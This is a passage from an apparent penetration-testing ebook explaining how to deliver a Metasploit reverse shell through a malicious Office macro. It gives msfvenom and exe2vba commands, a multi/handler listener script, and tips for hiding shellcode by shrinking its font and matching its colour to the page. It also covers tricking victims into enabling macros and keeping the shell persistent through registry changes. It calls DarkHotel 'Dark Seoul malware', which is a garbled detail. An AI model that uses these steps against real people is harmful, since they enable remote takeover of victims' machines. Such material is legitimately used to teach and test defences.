Conducting attacks using VBScript

Visual Basic Scripting (VBScript) edition is an Active Scripting language developed by Microsoft. It was designed to be a lightweight, Windows-native language that could execute small programs. VBScript has been installed by default on every desktop release of Microsoft Windows since Windows 98, making it an excellent target for client-side attacks. In August 2018, a well-known advanced persistent threat (APT) named DarkHotel (Dark Seoul malware) utilized the VBScript engine in Microsoft Windows, which exploited the specific vulnerability in Internet Explorer 11.0.

To launch an attack using VBScript, we'll use msfvenom from the command line:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

Note that -f designates that the output will be a file that is VBA executable. The output will appear as a text file with two specific parts, as shown in the following screenshot:

To use the script, open a Microsoft Office document and create a macro (the specific command will depend on the version of Microsoft Windows in use). Copy the first part of the text given in the following information box (from Sub Auto_Open() to the final End Sub statement) into the macro editor and save it with macros enabled:

'************************************************************** 
'* 
'* MACRO CODE 
'* 
'************************************************************** 
 
Sub Auto_Open() 
        Pzstu12 
End Sub 
// Additional code removed for clarity 
 
Sub Workbook_Open() 
        Auto_Open 
End Sub 

Next, copy the shellcode into the actual document. A partial excerpt of the shellcode is shown in the following screenshot:

The shellcode is recognizable as a script that may be used to perform an attack, so you may wish to hide or otherwise obfuscate the shellcode by minimizing the font size and match the color to the document's background.

The attacker must set up a listener on Metasploit. After entering msfconsole at command prompt, the attacker will typically enter the following commands and set the options for host, port, and payload; in addition, the attacker will configure the connection to automatically migrate to the more stable explorer.exe process, as shown in the following lines of command:

use exploit/multi/handler 
set lhost 192.168.43.130
set lport 4444
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Add the preceding lines into a file, call it vbexploit.rc, and run the following command:

msfconsole -q -r vbexploit.rc

When the file is sent to the target, it will launch a pop-up security warning when it is opened; therefore, attackers will use social engineering to force the intended victim to select the Enable option. One of the most common methods to do this is to embed the macro in a Microsoft Word document or Excel Spreadsheet that has been configured to play a game.

Launching the document will create a reverse TCP shell back to the attacker, allowing the attacker to ensure a persistent connection with the target and conduct post exploit activities.

To extend this attack methodology, we can convert any executable to VBScript using msf-exe2vba directly from the command line or exe2vba located at /usr/share/metasploit-framework/tools/exploit/.

In this example, we will use the same .exe that we created; for example, first create a backdoor using the Metasploit framework. Note that X designates that the backdoor will be created as an executable (attack.exe), as shown in the following screenshot:

Next, execute exe2.vba to convert the executable to VBScript using the following command and ensure that the correct pathnames are used:

root@kali:/usr/share/metasploit-framework/tools/exploit# ruby exe2vba.rb ~/attack.exeattack.vbs
[*] Converted 20254 bytes of EXE into a VBA script

This will allow the executable to be placed in a Microsoft macro-enabled document and sent to a client. VBScript can be used to execute the reverse shell and to alter the system registry in order to ensure that the shell remains persistent. We have found attacks of this type to be one of the most effective ways to bypass network security controls and maintain a connection to a secured network.

From an attacker's perspective, there are some significant advantages of using exploits based on VBScript (which used to be a powerful tool). However, it is now rapidly replaced by powerful scripting language, PowerShell.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
100.24.20.141